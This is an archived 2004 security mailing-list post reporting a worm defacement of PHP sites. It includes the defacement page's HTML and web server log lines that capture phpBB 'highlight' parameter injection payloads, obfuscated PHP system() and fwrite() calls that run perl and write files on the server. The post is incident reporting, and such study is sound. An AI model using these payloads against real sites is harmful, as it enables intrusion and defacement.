[unisog] php sites hacked...

Vijay S Sarvepalli VSSARVEP VSSARVEP at uncg.edu
Mon Dec 20 16:59:25 UTC 2004


HA!  looks like the phpBB hack allowed access to all WWW user associaed 
files.  Wherever the user permissions
existed the files were overwritten such as *.html and *.php 

Vijay

voyager.site5.com - - [20/Dec/2004:09:18:54 -0500] "GET 
/viewtopic.php?t=2909&si
d=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Esystem(chr(112)%252echr(1
01)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%2
52echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252ec
hr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%
252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252e
chr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(3
2)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%
252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252ech
r(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(10
6)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252e
chr(34))%252e%2527 HTTP/1.0" 200 49196 
"http://helifreak.com/viewtopic.php?t=290
9&sid=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Esystem(chr(112)%252ec
hr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(3
2)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%2
52echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(
62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%
252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252ec
hr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(
32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%25
2echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252ech
r(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%
252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1)"
voyager.site5.com - - [20/Dec/2004:09:19:00 -0500] "GET 
/viewtopic.php?t=2909&si
d=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Efwrite(fopen(chr(109)%252
echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)
),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr
(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%25
2echr(32)),exit%252e%2527 HTTP/1.0" 200 11409 
"http://helifreak.com/viewtopic.ph
p?t=2909&sid=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Efwrite(fopen(c
hr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(1
02),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(1
14)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%2
52echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252e
chr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; 
Window
s NT 5.1)"





Vijay S Sarvepalli VSSARVEP <VSSARVEP at uncg.edu> 
Sent by: unisog-bounces at lists.sans.org
12/20/2004 10:06 AM
Please respond to
UNIversity Security Operations Group <unisog at lists.sans.org>


To
unisog at lists.sans.org
cc

Subject
[unisog] php sites hacked...







All php sites in our one server have been hacked, defaced with 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<HTML><HEAD> 
<TITLE>This site is defaced!!!</TITLE> 
</HEAD><BODY bgcolor="#000000" text="#FF0000"> 
<H1>This site is defaced!!!</H1> 
<HR> 
<ADDRESS><b>NeverEverNoSanity WebWorm generation 9.</b></ADDRESS> 
</BODY></HTML> 
Do you guys know what vulernability this is? 

Vijay_______________________________________________
unisog mailing list
unisog at lists.sans.org
http://www.dshield.org/mailman/listinfo/unisog

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.dshield.org/pipermail/unisog/attachments/20041220/c38d0bfa/attachment.html


More information about the unisog mailing list